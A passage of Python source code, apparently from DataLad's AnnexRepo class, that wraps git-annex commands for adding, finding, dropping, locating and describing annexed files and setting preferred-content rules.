{}\n fetch_files = []\n keys_seen = set()\n unknown_sizes = [] # unused atm\n # for now just record total size, and\n for j in self._call_annex_records(\n ['find'] + expr, files=files,\n merge_annex_branches=merge_annex_branches\n ):\n # TODO: some files might not even be here. So in current fancy\n # output reporting scheme we should then theoretically handle\n # those cases here and say 'impossible' or something like that\n if not j.get('success', True):\n # TODO: I guess do something with yielding and filtering for\n # what need to be done and what not\n continue\n key = j['key']\n size = j.get('bytesize')\n if key in keys_seen:\n # multiple files could point to the same key. no need to\n # request multiple times\n continue\n keys_seen.add(key)\n assert j['file']\n fetch_files.append(j['file'])\n if size and size.isdigit():\n expected_files[key] = int(size)\n else:\n expected_files[key] = None\n unknown_sizes.append(j['file'])\n return expected_files, fetch_files\n\n @normalize_paths\n def add(self, files, git=None, backend=None, options=None, jobs=None,\n git_options=None, annex_options=None, update=False):\n \"\"\"Add file(s) to the repository.\n\n Parameters\n ----------\n files: list of str\n list of paths to add to the annex\n git: bool\n if True, add to git instead of annex.\n backend:\n options:\n update: bool\n --update option for git-add. From git's manpage:\n Update the index just where it already has an entry matching\n <pathspec>. This removes as well as modifies index entries to match\n the working tree, but adds no new files.\n\n If no <pathspec> is given when --update option is used, all tracked\n files in the entire working tree are updated (old versions of Git\n used to limit the update to the current directory and its\n subdirectories).\n\n Note: Used only, if a call to git-add instead of git-annex-add is\n performed\n\n Returns\n -------\n list of dict or dict\n \"\"\"\n\n return list(self.add_(\n files, git=git, backend=backend, options=options, jobs=jobs,\n git_options=git_options, annex_options=annex_options, update=update\n ))\n\n def add_(self, files, git=None, backend=None, options=None, jobs=None,\n git_options=None, annex_options=None, update=False):\n \"\"\"Like `add`, but returns a generator\"\"\"\n if update and not git:\n raise InsufficientArgumentsError(\"option 'update' requires 'git', too\")\n\n if git_options:\n # TODO: note that below we would use 'add with --dry-run\n # so passed here options might need to be passed into it??\n lgr.warning(\"add: git_options not yet implemented. Ignored.\")\n\n if annex_options:\n lgr.warning(\"annex_options not yet implemented. Ignored.\")\n\n options = options[:] if options else []\n\n # TODO: RM DIRECT? not clear if this code didn't become \"generic\" and\n # not only \"direct mode\" specific, so kept for now.\n # Note: As long as we support direct mode, one should not call\n # super().add() directly. Once direct mode is gone, we might remove\n # `git` parameter and call GitRepo's add() instead.\n\n def _get_to_be_added_recs(paths):\n \"\"\"Try to collect what actually is going to be added\n\n This is used for progress information\n \"\"\"\n\n # TODO: RM DIRECT? might remain useful to detect submods left in direct mode\n # Note: if a path involves a submodule in direct mode, while we\n # are not in direct mode at current level, we might still fail.\n # Hence the except clause is still needed. However, this is\n # unlikely, since direct mode usually should be used only, if it\n # was enforced by FS and/or OS and therefore concerns the entire\n # hierarchy.\n _git_options = ['--dry-run', '-N', '--ignore-missing']\n try:\n for r in super(AnnexRepo, self).add_(\n files, git_options=_git_options, update=update):\n yield r\n return\n except CommandError as e:\n ce = CapturedException(e)\n # TODO: RM DIRECT? left for detection of direct mode submodules\n if AnnexRepo._is_annex_work_tree_message(e.stderr):\n raise DirectModeNoLongerSupportedError(\n self) from e\n raise\n\n # Theoretically we could have done for git as well, if it could have\n # been batched\n # Call git annex add for any to have full control of whether to go\n # to git or to annex\n # 1. Figure out what actually will be added\n to_be_added_recs = _get_to_be_added_recs(files)\n # collect their sizes for the progressbar\n expected_additions = {\n rec['file']: self.get_file_size(rec['file'])\n for rec in to_be_added_recs\n }\n\n # if None -- leave it to annex to decide\n if git is False:\n options.append(\"--force-large\")\n\n if git:\n # explicitly use git-add with --update instead of git-annex-add\n # TODO: This might still need some work, when --update AND files\n # are specified!\n for r in super(AnnexRepo, self).add(\n files,\n git=True,\n git_options=git_options,\n update=update):\n yield r\n\n else:\n if backend:\n options.extend(('--backend', backend))\n for r in self._call_annex_records(\n ['add'] + options,\n files=files,\n jobs=jobs,\n total_nbytes=sum(expected_additions.values())):\n yield r\n\n @normalize_paths\n def get_file_key(self, files, batch=None):\n \"\"\"DEPRECATED. Use get_content_annexinfo()\n\n See the method body for how to use get_content_annexinfo() to\n replace get_file_key().\n\n For single-file queries it is recommended to consider\n get_file_annexinfo()\n \"\"\"\n import warnings\n warnings.warn(\n \"AnnexRepo.get_file_key() is deprecated, \"\n \"use get_content_annexinfo() instead.\",\n DeprecationWarning)\n\n # this is only needed, because a previous implementation wanted to\n # disect reasons for not being able to report a key: file not there,\n # file in git, but not annexed. If not for that, this could be\n #init = None\n init = dict(\n zip(\n [self.pathobj / f for f in files],\n [{} for i in range(len(files))]\n )\n )\n info = self.get_content_annexinfo(\n files,\n init=init,\n )\n keys = [r.get('key', '') for r in info.values()]\n\n # everything below is only needed to achieve compatibility with the\n # complex behavior of a previous implementation if not for that, we\n # could achieve uniform behavior regardless of input specifics with a\n # simple\n #return keys\n\n if batch is not True and len(files) == 1 and '' in keys:\n not_found = [\n p\n for p, r in info.items()\n if r.get('success') is False and r.get('note') == 'not found'\n ]\n if not_found:\n raise FileNotInAnnexError(\n cmd='find',\n msg=f\"File not in annex: {not_found}\",\n filename=not_found)\n\n no_annex = [p for p, r in info.items() if not r]\n if no_annex:\n raise FileInGitError(\n cmd='find',\n msg=f\"File not in annex, but git: {no_annex}\",\n filename=no_annex)\n\n if batch is True and len(files) == 1 and len(keys) == 1:\n keys = keys[0]\n\n return keys\n\n @normalize_paths\n def unlock(self, files):\n \"\"\"unlock files for modification\n\n Note: This method is silent about errors in unlocking a file (e.g, the\n file has not content). Use the higher-level interface.unlock to get\n more informative reporting.\n\n Parameters\n ----------\n files: list of str\n\n Returns\n -------\n list of str\n successfully unlocked files\n \"\"\"\n if not files:\n return\n return [j[\"file\"] for j in\n self.call_annex_records([\"unlock\"], files=files)\n if j[\"success\"]]\n\n def adjust(self, options=None):\n \"\"\"enter an adjusted branch\n\n This command is only available in a v6+ git-annex repository.\n\n Parameters\n ----------\n options: list of str\n currently requires '--unlock' or '--fix';\n default: --unlock\n \"\"\"\n # TODO: Do we want to catch the case that\n # \"adjusted/<current_branch_name>(unlocked)\" already exists and\n # just check it out? Or fail like annex itself does?\n\n # version check:\n if not self.supports_unlocked_pointers:\n raise CommandNotAvailableError(\n cmd='git annex adjust',\n msg=('git-annex-adjust requires a '\n 'version that supports unlocked pointers'))\n\n options = options[:] if options else to_options(unlock=True)\n self.call_annex(['adjust'] + options)\n\n @normalize_paths\n def unannex(self, files, options=None):\n \"\"\"undo accidental add command\n\n Use this to undo an accidental git annex add command. Note that for\n safety, the content of the file remains in the annex, until you use git\n annex unused and git annex dropunused.\n\n Parameters\n ----------\n files: list of str\n options: list of str\n\n Returns\n -------\n list of str\n successfully unannexed files\n \"\"\"\n\n options = options[:] if options else []\n prefix = 'unannex'\n suffix = 'ok'\n return [\n # we cannot .split here since filename could have spaces\n self._unquote_annex_path(line[len(prefix) + 1 : -(len(suffix) + 1)])\n for line in self.call_annex_items_(['unannex'] + options, files=files)\n if line.split()[0] == prefix and line.split()[-1] == suffix\n ]\n\n @normalize_paths(map_filenames_back=True)\n def find(self, files, batch=False):\n \"\"\"Run `git annex find` on file(s).\n\n Parameters\n ----------\n files: list of str\n files to find under annex\n batch: bool, optional\n initiate or continue with a batched run of annex find, instead of just\n calling a single git annex find command. If any items in `files`\n are directories, this value is treated as False.\n\n Returns\n -------\n A dictionary the maps each item in `files` to its `git annex find`\n result. Items without a successful result will be an empty string, and\n multi-item results (which can occur for if `files` includes a\n directory) will be returned as a list.\n \"\"\"\n objects = {}\n # Ignore batch=True if any path is a directory because `git annex find\n # --batch` always returns an empty string for directories.\n if batch and not any(isdir(opj(self.path, f)) for f in files):\n find = self._batched.get(\n 'find', json=True, path=self.path,\n # Since we are just interested in local information\n git_options=['-c', 'annex.merge-annex-branches=false']\n )\n objects = {f: json_out.get(\"file\", \"\")\n for f, json_out in zip(files, find(files))}\n else:\n for f in files:\n try:\n res = self._call_annex(\n ['find', \"--print0\"],\n files=[f],\n merge_annex_branches=False,\n )\n items = res['stdout'].rstrip(\"\\0\").split(\"\\0\")\n objects[f] = items[0] if len(items) == 1 else items\n except CommandError:\n objects[f] = ''\n\n return objects\n\n def _check_files(self, fn, files, batch):\n # Helper that isolates the common logic in `file_has_content` and\n # `is_under_annex`. `fn` is the annex command used to do the check, and\n # `quick_fn` is the non-annex variant.\n pointers = self.supports_unlocked_pointers\n # We're only concerned about modified files in V6+ mode. In V5\n # `find` returns an empty string for unlocked files.\n #\n # ATTN: test_AnnexRepo_file_has_content has a failure before Git\n # v2.13 (tested back to v2.9) because this diff call unexpectedly\n # reports a type change as modified.\n modified = [\n f for f in self.call_git_items_(\n ['diff', '--name-only', '-z'], sep='\\0')\n if f] if pointers else []\n annex_res = fn(files, normalize_paths=False, batch=batch)\n return [bool(annex_res.get(f) and\n not (pointers and normpath(f) in modified))\n for f in files]\n\n @normalize_paths\n def file_has_content(self, files, allow_quick=False, batch=False):\n \"\"\"Check whether files have their content present under annex.\n\n Parameters\n ----------\n files: list of str\n file(s) to check for being actually present.\n allow_quick: bool, optional\n This is no longer supported.\n\n Returns\n -------\n list of bool\n For each input file states whether file has content locally\n \"\"\"\n # TODO: Also provide option to look for key instead of path\n return self._check_files(self.find, files, batch)\n\n @normalize_paths\n def is_under_annex(self, files, allow_quick=False, batch=False):\n \"\"\"Check whether files are under annex control\n\n Parameters\n ----------\n files: list of str\n file(s) to check for being under annex\n allow_quick: bool, optional\n This is no longer supported.\n\n Returns\n -------\n list of bool\n For each input file states whether file is under annex\n \"\"\"\n # theoretically in direct mode files without content would also be\n # broken symlinks on the FSs which support it, but that would complicate\n # the matters\n\n # This is an ugly hack to prevent files from being treated as\n # remotes by `git annex info`. See annex's `nameToUUID'`.\n files = [opj(curdir, f) for f in files]\n\n def check(files, **kwargs):\n # Filter out directories because it doesn't make sense to ask if\n # they are under annex control and `info` can only handle\n # non-directories.\n return self.info([f for f in files if not isdir(f)],\n fast=True, **kwargs)\n\n return self._check_files(check, files, batch)\n\n def init_remote(self, name, options):\n \"\"\"Creates a new special remote\n\n Parameters\n ----------\n name: str\n name of the special remote\n \"\"\"\n # TODO: figure out consistent way for passing options + document\n self.call_annex(['initremote'] + [name] + options)\n self.config.reload()\n\n def enable_remote(self, name, options=None, env=None):\n \"\"\"Enables use of an existing special remote\n\n Parameters\n ----------\n name: str\n name, the special remote was created with\n options: list, optional\n \"\"\"\n\n # MIH thinks there should be no `env` argument at all\n # https://github.com/datalad/datalad/issues/5162\n env = env or self._git_runner.env\n try:\n from unittest.mock import patch\n with patch.object(self._git_runner, 'env', env):\n # TODO: outputs are nohow used/displayed. Eventually convert to\n # to a generator style yielding our \"dict records\"\n self.call_annex(['enableremote', name] + ensure_list(options))\n except CommandError as e:\n if re.match(r'.*StatusCodeException.*statusCode = 401', e.stderr):\n raise AccessDeniedError(e.stderr)\n elif 'FailedConnectionException' in e.stderr:\n raise AccessFailedError(e.stderr)\n else:\n raise e\n self.config.reload()\n\n def merge_annex(self, remote=None): # do not use anymore, use localsync()\n self.localsync(remote)\n\n def sync(self, remotes=None, push=True, pull=True, commit=True,\n content=False, all=False, fast=False):\n \"\"\"This method is deprecated, use call_annex(['sync', ...]) instead.\n\n Synchronize local repository with remotes\n\n Use this command when you want to synchronize the local repository\n with one or more of its remotes. You can specify the remotes (or\n remote groups) to sync with by name; the default if none are specified\n is to sync with all remotes.\n\n Parameters\n ----------\n remotes: str, list(str), optional\n Name of one or more remotes to be sync'ed.\n push : bool\n By default, git pushes to remotes.\n pull : bool\n By default, git pulls from remotes\n commit : bool\n A commit is done by default. Disable to avoid committing local\n changes.\n content : bool\n Normally, syncing does not transfer the contents of annexed\n files. This option causes the content of files in the work tree\n to also be uploaded and downloaded as necessary.\n all : bool\n This option, when combined with `content`, makes all available\n versions of all files be synced, when preferred content settings\n allow\n fast : bool\n Only sync with the remotes with the lowest annex-cost value\n configured\n \"\"\"\n import warnings\n warnings.warn(\n \"AnnexRepo.sync() is deprecated, use call_annex(['sync', ...]) \"\n \"instead.\",\n DeprecationWarning)\n args = []\n args.extend(to_options(push=push, no_push=not push,\n # means: '--push' if push else '--no-push'\n pull=pull, no_pull=not pull,\n commit=commit, no_commit=not commit,\n content=content, no_content=not content,\n all=all,\n fast=fast))\n args.extend(ensure_list(remotes))\n self.call_annex(['sync'] + args)\n\n @normalize_path\n def add_url_to_file(self, file_, url, options=None, backend=None,\n batch=False, git_options=None, annex_options=None,\n unlink_existing=False):\n \"\"\"Add file from url to the annex.\n\n Downloads `file` from `url` and add it to the annex.\n If annex knows `file` already,\n records that it can be downloaded from `url`.\n\n Note: Consider using the higher-level `download_url` instead.\n\n Parameters\n ----------\n file_: str\n\n url: str\n\n options: list\n options to the annex command\n\n batch: bool, optional\n initiate or continue with a batched run of annex addurl, instead of just\n calling a single git annex addurl command\n\n unlink_existing: bool, optional\n by default crashes if file already exists and is under git.\n With this flag set to True would first remove it.\n\n Returns\n -------\n dict\n In batch mode only ATM returns dict representation of json output returned\n by annex\n \"\"\"\n\n if git_options:\n lgr.warning(\"add_url_to_file: git_options not yet implemented. Ignored.\")\n\n if annex_options:\n lgr.warning(\"annex_options not yet implemented. Ignored.\")\n\n options = options[:] if options else []\n if backend:\n options.extend(('--backend', backend))\n git_options = []\n if lexists(opj(self.path, file_)) and \\\n unlink_existing and \\\n not self.is_under_annex(file_):\n # already under git, we can't addurl for under annex\n lgr.warning(\n \"File %s:%s is already under git, removing so it could possibly\"\n \" be added under annex\", self, file_\n )\n unlink(opj(self.path, file_))\n if not batch or self.fake_dates_enabled:\n if batch:\n lgr.debug(\"Not batching addurl call \"\n \"because fake dates are enabled\")\n files_opt = '--file=%s' % file_\n out_json = self._call_annex_records(\n ['addurl'] + options + [files_opt] + [url],\n progress=True,\n )\n if len(out_json) != 1:\n raise AssertionError(\n \"should always be a single-item list, Got: %s\"\n % str(out_json))\n # Make the output's structure match bcmd's.\n out_json = out_json[0]\n # Don't capture stderr, since download progress provided by wget\n # uses stderr.\n else:\n options += ['--with-files']\n if backend:\n options += ['--backend=%s' % backend]\n # Initializes (if necessary) and obtains the batch process\n bcmd = self._batched.get(\n # Since backend will be critical for non-existing files\n 'addurl_to_file_backend:%s' % backend,\n annex_cmd='addurl',\n git_options=git_options,\n annex_options=options, # --raw ?\n path=self.path,\n json=True\n )\n try:\n out_json = bcmd((url, file_))\n except Exception as exc:\n # if isinstance(exc, IOError):\n # raise\n raise AnnexBatchCommandError(\n cmd=\"addurl\",\n msg=\"Adding url %s to file %s failed\" % (url, file_)) from exc\n assert \\\n (out_json.get('command') == 'addurl'), \\\n \"no exception was raised and no 'command' in result out_json=%s\" % str(out_json)\n if not out_json.get('success', False):\n raise (AnnexBatchCommandError if batch else CommandError)(\n cmd=\"addurl\",\n msg=\"Error, annex reported failure for addurl (url='%s'): %s\"\n % (url, str(out_json)))\n return out_json\n\n def add_urls(self, urls, options=None, backend=None, cwd=None,\n jobs=None,\n git_options=None, annex_options=None):\n \"\"\"Downloads each url to its own file, which is added to the annex.\n\n .. deprecated:: 0.17\n Use add_url_to_file() or call_annex() instead.\n\n Parameters\n ----------\n urls: list of str\n\n options: list, optional\n options to the annex command\n\n cwd: string, optional\n working directory from within which to invoke git-annex\n \"\"\"\n warnings.warn(\n \"AnnexRepo.add_urls() is deprecated and will be removed in a \"\n \"future release. Use AnnexRepo.add_url_to_file() or \"\n \"AnnexRepo.call_annex() instead.\",\n DeprecationWarning)\n\n if git_options:\n lgr.warning(\"add_urls: git_options not yet implemented. Ignored.\")\n\n git_options = []\n if cwd:\n git_options.extend(('-C', cwd))\n\n if annex_options:\n lgr.warning(\"annex_options not yet implemented. Ignored.\")\n\n options = options[:] if options else []\n\n if backend:\n options.extend(('--backend', backend))\n\n return self._call_annex_records(\n ['addurl'] + options + urls,\n git_options=git_options,\n progress=True)\n\n @normalize_path\n def rm_url(self, file_, url):\n \"\"\"Record that the file is no longer available at the url.\n\n Parameters\n ----------\n file_: str\n\n url: str\n \"\"\"\n self.call_annex(['rmurl'], files=[file_, url])\n\n @normalize_path\n def get_urls(self, file_, key=False, batch=False):\n \"\"\"Get URLs for a file/key\n\n Parameters\n ----------\n file_: str\n key: bool, optional\n Whether provided files are actually annex keys\n\n Returns\n -------\n A list of URLs\n \"\"\"\n locations = self.whereis(file_, output='full', key=key, batch=batch)\n return locations.get(WEB_SPECIAL_REMOTE_UUID, {}).get('urls', [])\n\n @normalize_paths\n def drop(self, files, options=None, key=False, jobs=None):\n \"\"\"Drops the content of annexed files from this repository.\n\n Drops only if possible with respect to required minimal number of\n available copies.\n\n Parameters\n ----------\n files: list of str\n paths to drop\n options : list of str, optional\n commandline options for the git annex drop command\n jobs : int, optional\n how many jobs to run in parallel (passed to git-annex call)\n\n Returns\n -------\n list(JSON objects)\n 'success' item in each object indicates failure/success per file\n path.\n \"\"\"\n\n # annex drop takes either files or options\n # --all, --unused, --key, or --incomplete\n # for now, most simple test; to be replaced by a more general solution\n # (exception thrown by _run_annex_command)\n if not files and \\\n (not options or\n not any([o in options for o in\n [\"--all\", \"--unused\", \"--key\", \"--incomplete\"]])):\n raise InsufficientArgumentsError(\"drop() requires at least to \"\n \"specify 'files' or 'options'\")\n\n options = ensure_list(options)\n\n if key:\n # we can't drop multiple in 1 line, and there is no --batch yet, so\n # one at a time\n files = ensure_list(files)\n options = options + ['--key']\n res = [\n self._call_annex_records(\n ['drop'] + options + [k],\n jobs=jobs)\n for k in files\n ]\n # `normalize_paths` ... magic, useful?\n if len(files) == 1:\n return res[0]\n else:\n return res\n else:\n return self._call_annex_records(\n ['drop'] + options,\n files=files,\n jobs=jobs)\n\n def drop_key(self, keys, options=None, batch=False):\n \"\"\"Drops the content of annexed files from this repository referenced by keys\n\n Dangerous: it drops without checking for required minimal number of\n available copies.\n\n Parameters\n ----------\n keys: list of str, str\n\n batch: bool, optional\n initiate or continue with a batched run of annex dropkey, instead of just\n calling a single git annex dropkey command\n \"\"\"\n keys = [keys] if isinstance(keys, str) else keys\n\n options = options[:] if options else []\n options += ['--force']\n if not batch or self.fake_dates_enabled:\n if batch:\n lgr.debug(\"Not batching drop_key call \"\n \"because fake dates are enabled\")\n json_objects = self.call_annex_records(\n ['dropkey'] + options, files=keys\n )\n else:\n json_objects = self._batched.get(\n 'dropkey',\n annex_options=options, json=True, path=self.path\n )(keys)\n # TODO: RF to be consistent with the rest (IncompleteResultError or alike)\n # and/or completely refactor since drop above also has key option\n for j in json_objects:\n assert j.get('success', True)\n\n # TODO: a dedicated unit-test\n def _whereis_json_to_dict(self, j):\n \"\"\"Convert json record returned by annex whereis --json to our dict representation for it\n \"\"\"\n # process 'whereis' containing list of remotes\n remotes = {remote['uuid']: {x: remote.get(x, None)\n for x in ('description', 'here', 'urls')\n }\n for remote in j['whereis']}\n return remotes\n\n # TODO: reconsider having any magic at all and maybe just return a list/dict always\n @normalize_paths\n def whereis(self, files, output='uuids', key=False, options=None, batch=False):\n \"\"\"Lists repositories that have actual content of file(s).\n\n Parameters\n ----------\n files: list of str\n files to look for\n output: {'descriptions', 'uuids', 'full'}, optional\n If 'descriptions', a list of remotes descriptions returned is per\n each file. If 'full', for each file a dictionary of all fields\n is returned as returned by annex\n key: bool, optional\n Whether provided files are actually annex keys\n options: list, optional\n Options to pass into git-annex call\n\n Returns\n -------\n list of list of unicode or dict\n if output == 'descriptions', contains a list of descriptions of remotes\n for each input file, describing the remote for each remote, which\n was found by git-annex whereis, like::\n\n u'me@mycomputer:~/where/my/repo/is [origin]' or\n u'web' or\n u'me@mycomputer:~/some/other/clone'\n\n if output == 'uuids', returns a list of uuids.\n if output == 'full', returns a dictionary with filenames as keys\n and values a detailed record, e.g.::\n\n {'00000000-0000-0000-0000-000000000001': {\n 'description': 'web',\n 'here': False,\n 'urls': ['http://127.0.0.1:43442/about.txt', 'http://example.com/someurl']\n }}\n \"\"\"\n OUTPUTS = {'descriptions', 'uuids', 'full'}\n if output not in OUTPUTS:\n raise ValueError(\n \"Unknown value output=%r. Known are %s\"\n % (output, ', '.join(map(repr, OUTPUTS)))\n )\n\n options = ensure_list(options, copy=True)\n if batch:\n # TODO: --batch-keys was added to 8.20210903\n if key:\n if not self._check_version_kludges(\"grp1-supports-batch-keys\"):\n raise ValueError(\"batch=True for `key=True` requires git-annex >= 8.20210903\")\n bkw = {'batch_opt': '--batch-keys'}\n else:\n bkw = {}\n bcmd = self._batched.get('whereis', annex_options=options,\n json=True, path=self.path, **bkw)\n json_objects = bcmd(files)\n else:\n cmd = ['whereis'] + options\n\n def _call_cmd(cmd, files=None):\n \"\"\"Helper to reuse consistently in case of --key and not invocations\"\"\"\n try:\n return self.call_annex_records(cmd, files=files)\n except CommandError as e:\n if e.stderr.startswith('Invalid'):\n # would happen when git-annex is called with incompatible options\n raise\n # whereis may exit non-zero when there are too few known copies\n # callers of whereis are interested in exactly that information,\n # which we deliver via result, not via exception\n return e.kwargs.get('stdout_json', [])\n\n if key:\n # whereis --key takes only a single key at a time so we need to loop\n json_objects = []\n for k in files:\n json_objects.extend(_call_cmd(cmd + [\"--key\", k]))\n else:\n json_objects = _call_cmd(cmd, files)\n\n # json_objects can contain entries w/o a \"whereis\" field. Unknown to\n # git paths in particular are returned in such records. Code below is\n # only concerned with actual whereis results.\n whereis_json_objects = [o for o in json_objects if \"whereis\" in\n o.keys()]\n\n if output in {'descriptions', 'uuids'}:\n return [\n [remote.get(output[:-1]) for remote in j.get('whereis')]\n if j.get('success') else []\n for j in whereis_json_objects\n ]\n elif output == 'full':\n # TODO: we might want to optimize storage since many remotes entries will be the\n # same so we could just reuse them instead of brewing copies\n return {\n j['key']\n if (key or '--all' in options)\n # report is always POSIX, but normalize_paths wants to match against\n # the native representation\n else str(Path(PurePosixPath(j['file'])))\n if on_windows else j['file']\n : self._whereis_json_to_dict(j)\n for j in whereis_json_objects\n if not j.get('key', '').endswith('.this-is-a-test-key')\n }\n\n # TODO:\n # I think we should make interface cleaner and less ambiguous for those annex\n # commands which could operate on globs, files, and entire repositories, separating\n # those out, e.g. annex_info_repo, annex_info_files at least.\n # If we make our calling wrappers work without relying on invoking from repo topdir,\n # then returned filenames would not need to be mapped, so we could easily work on dirs\n # and globs.\n # OR if explicit filenames list - return list of matching entries, if globs/dirs -- return dict?\n @normalize_paths(map_filenames_back=True)\n def info(self, files, batch=False, fast=False):\n \"\"\"Provide annex info for file(s).\n\n Parameters\n ----------\n files: list of str\n files to look for\n\n Returns\n -------\n dict\n Info for each file\n \"\"\"\n\n options = ['--bytes', '--fast'] if fast else ['--bytes']\n\n if not batch:\n json_objects = self._call_annex_records(\n ['info'] + options, files=files, merge_annex_branches=False,\n exception_on_error=False,\n )\n else:\n # according to passing of the test_AnnexRepo_is_under_annex\n # test with batch=True, there is no need for explicit\n # exception_on_error=False, batched process does not raise\n # CommandError.\n json_objects = self._batched.get(\n 'info',\n annex_options=options, json=True, path=self.path,\n git_options=['-c', 'annex.merge-annex-branches=false']\n )(files)\n\n # Some aggressive checks. ATM info can be requested only per file\n # json_objects is a generator, let's keep it that way\n # assert(len(json_objects) == len(files))\n # and that they all have 'file' equal to the passed one\n out = {}\n for j, f in zip(json_objects, files):\n # Starting with version of annex 8.20200330-100-g957a87b43\n # annex started to normalize relative paths.\n # ref: https://github.com/datalad/datalad/issues/4431\n # Use normpath around each side to ensure it is the same file\n assert normpath(j.pop('file')) == normpath(f)\n if not j['success']:\n j = None\n else:\n assert(j.pop('success') is True)\n # convert size to int\n j['size'] = int(j['size']) if 'unknown' not in j['size'] else None\n # and pop the \"command\" field\n j.pop(\"command\")\n out[f] = j\n return out\n\n def repo_info(self, fast=False, merge_annex_branches=True):\n \"\"\"Provide annex info for the entire repository.\n\n Parameters\n ----------\n fast : bool, optional\n Pass `--fast` to `git annex info`.\n merge_annex_branches : bool, optional\n Whether to allow git-annex if needed to merge annex branches, e.g. to\n make sure up to date descriptions for git annex remotes\n\n Returns\n -------\n dict\n Info for the repository, with keys matching the ones returned by annex\n \"\"\"\n\n options = ['--bytes', '--fast'] if fast else ['--bytes']\n\n json_records = list(self._call_annex_records(\n ['info'] + options, merge_annex_branches=merge_annex_branches)\n )\n assert(len(json_records) == 1)\n\n # TODO: we need to abstract/centralize conversion from annex fields\n # For now just tune up few for immediate usability\n info = json_records[0]\n for k in info:\n if k.endswith(' size') or k.endswith(' disk space') or k.startswith('size of '):\n size = info[k].split()[0]\n if size.isdigit():\n info[k] = int(size)\n else:\n lgr.debug(\"Size %r reported to be %s, setting to None\", k, size)\n info[k] = None\n assert(info.pop('success'))\n assert(info.pop('command') == 'info')\n return info # just as is for now\n\n def get_annexed_files(self, with_content_only=False, patterns=None):\n \"\"\"Get a list of files in annex\n\n Parameters\n ----------\n with_content_only : bool, optional\n Only list files whose content is present.\n patterns : list, optional\n Globs to pass to annex's `--include=`. Files that match any of\n these will be returned (i.e., they'll be separated by `--or`).\n\n Returns\n -------\n A list of POSIX file names\n \"\"\"\n if not patterns:\n args = [] if with_content_only else ['--include', \"*\"]\n else:\n if len(patterns) == 1:\n args = ['--include', patterns[0]]\n else:\n args = ['-(']\n for pat in patterns[:-1]:\n args.extend(['--include', pat, \"--or\"])\n args.extend(['--include', patterns[-1]])\n args.append('-)')\n\n if with_content_only:\n args.extend(['--in', '.'])\n # TODO: JSON\n return list(\n self.call_annex_items_(\n ['find', '-c', 'annex.merge-annex-branches=false'] + args))\n\n def get_preferred_content(self, property, remote=None):\n \"\"\"Get preferred content configuration of a repository or remote\n\n Parameters\n ----------\n property : {'wanted', 'required', 'group'}\n Type of property to query\n remote : str, optional\n If not specified (None), returns the property for the local\n repository.\n\n Returns\n -------\n str\n Whether the setting is returned, or `None` if there is none.\n\n Raises\n ------\n ValueError\n If an unknown property label is given.\n\n CommandError\n If the annex call errors.\n \"\"\"\n if property not in ('wanted', 'required', 'group'):\n raise ValueError(\n 'unknown preferred content property: {}'.format(property))\n return self.call_annex_oneline([property, remote or '.']) or None\n\n def set_preferred_content(self, property, expr, remote=None):\n \"\"\"Set preferred content configuration of a repository or remote\n\n Parameters\n ----------\n property : {'wanted', 'required', 'group'}\n Type of property to query\n expr : str\n Any expression or label supported by git-annex for the\n given property.\n remote : str, optional\n If not specified (None), sets the property for the local\n repository.\n\n Returns\n -------\n str\n Raw git-annex output in response to the set command.\n\n Raises\n ------\n ValueError\n If an unknown property label is given.\n\n CommandError\n If the annex call errors.\n \"\"\"\n if property not in ('wanted', 'required', 'group'):\n raise ValueError(\n 'unknown preferred content property: {}'.format(property))\n return self.call_annex_oneline([property, remote or '.', expr])\n\n def get_groupwanted(self, name):\n \"\"\"Get `groupwanted` expression for a group `name`\n\n Parameters\n ----------\n name : str\n Name of the groupwanted group\n \"\"\"\n return self.call_annex_oneline(['groupwanted', name])\n\n def set_groupwanted(self, name, expr):\n \"\"\"Set `expr` for the `name` groupwanted\"\"\"\n return self.call_annex_oneline(['groupwanted', name, expr])\n\n def precommit(self):\n \"\"\"Perform pre-commit maintenance tasks, such as closing all batched annexes\n since they might still need to flush their changes into index\n \"\"\"\n if self._batched is not None:\n self._batched.close()\n super(AnnexRepo, self).precommit()\n\n def get_contentlocation(self, key, batch=False):\n \"\"\"Get location of the key content\n\n Normally under .git/annex objects in indirect mode and within file\n tree in direct mode.\n\n Unfortunately there is no (easy) way to discriminate situations\n when given key is simply incorrect (not known to annex) or its content\n not currently present -- in both cases annex just silently exits with -1\n\n\n Parameters\n ----------\n key: str\n key\n batch: bool, optional\n initiate or continue with a batched run of annex contentlocation\n\n Returns\n -------\n str\n path relative to the top directory of the repository. If no content\n is present, empty string is returned\n \"\"\"\n\n if not batch:\n try:\n return next(self.call_annex_items_(['contentlocation', key]))\n except CommandError:\n return ''\n else:\n return self._batched.get('contentlocation', path=self.path)(key)\n\n @normalize_paths(serialize=True)\n def is_available(self, file_, remote=None, key=False, batch=False):\n \"\"\"Check if file or key is available (from a remote)\n\n In case if key or remote is misspecified, it wouldn't fail but just keep\n returning False, although possibly also complaining out loud ;)\n\n Parameters\n ----------\n file_: str\n Filename or a key\n remote: str, optional\n Remote which to check. If None, possibly multiple remotes are checked\n before positive result is reported\n key: bool, optional\n Whether provided files are actually annex keys\n batch: bool, optional\n Initiate or continue with a batched run of annex checkpresentkey\n\n Returns\n -------\n bool\n with True indicating that file/key is available from (the) remote\n \"\"\"\n\n if key:\n key_ = file_\n else:\n # TODO with eval_availability=True, the following call\n # would already provide the answer to is_available? for\n # the local annex\n key_ = self.get_file_annexinfo(file_)['key'] # ?, batch=batch\n\n annex_input = [key_,] if not remote else [key_, remote]\n\n if not batch:\n return self.call_annex_success(['checkpresentkey'] + annex_input)\n else:\n annex_cmd = [\"checkpresentkey\"] + ([remote] if remote else [])\n try:\n out = self._batched.get(\n ':'.join(annex_cmd), annex_cmd,\n path=self.path)(key_)\n except CommandError:\n # git-annex runs in batch mode, but will still signal some\n # errors, e.g. an unknown remote, by exiting with a non-zero\n # return code.\n return False\n try:\n return {\n # happens on travis in direct/heavy-debug mode, that process\n # exits and closes stdout (upon unknown key) before we could\n # read it, so we get None as the stdout.\n # see https://github.com/datalad/datalad/issues/2330\n # but it is associated with an unknown key, and for consistency\n # we report False there too, as to ''\n None: False,\n '': False, # when remote is misspecified ... stderr carries the msg\n '0': False,\n '1': True,\n }[out]\n except KeyError:\n raise ValueError(\n \"Received output %r from annex, whenever expect 0 or 1\" % out\n )\n\n @normalize_paths\n def migrate_backend(self, files, backend=None):\n \"\"\"Changes the backend used for `file`.\n\n The backend used for the key-value of `files`. Only files currently\n present are migrated.\n Note: There will be no notification if migrating fails due to the\n absence of a file's content!\n\n Parameters\n ----------\n files: list\n files to migrate.\n backend: str\n specify the backend to migrate to. If none is given, the\n default backend of this instance will be used.\n \"\"\"\n\n if self.is_direct_mode():\n 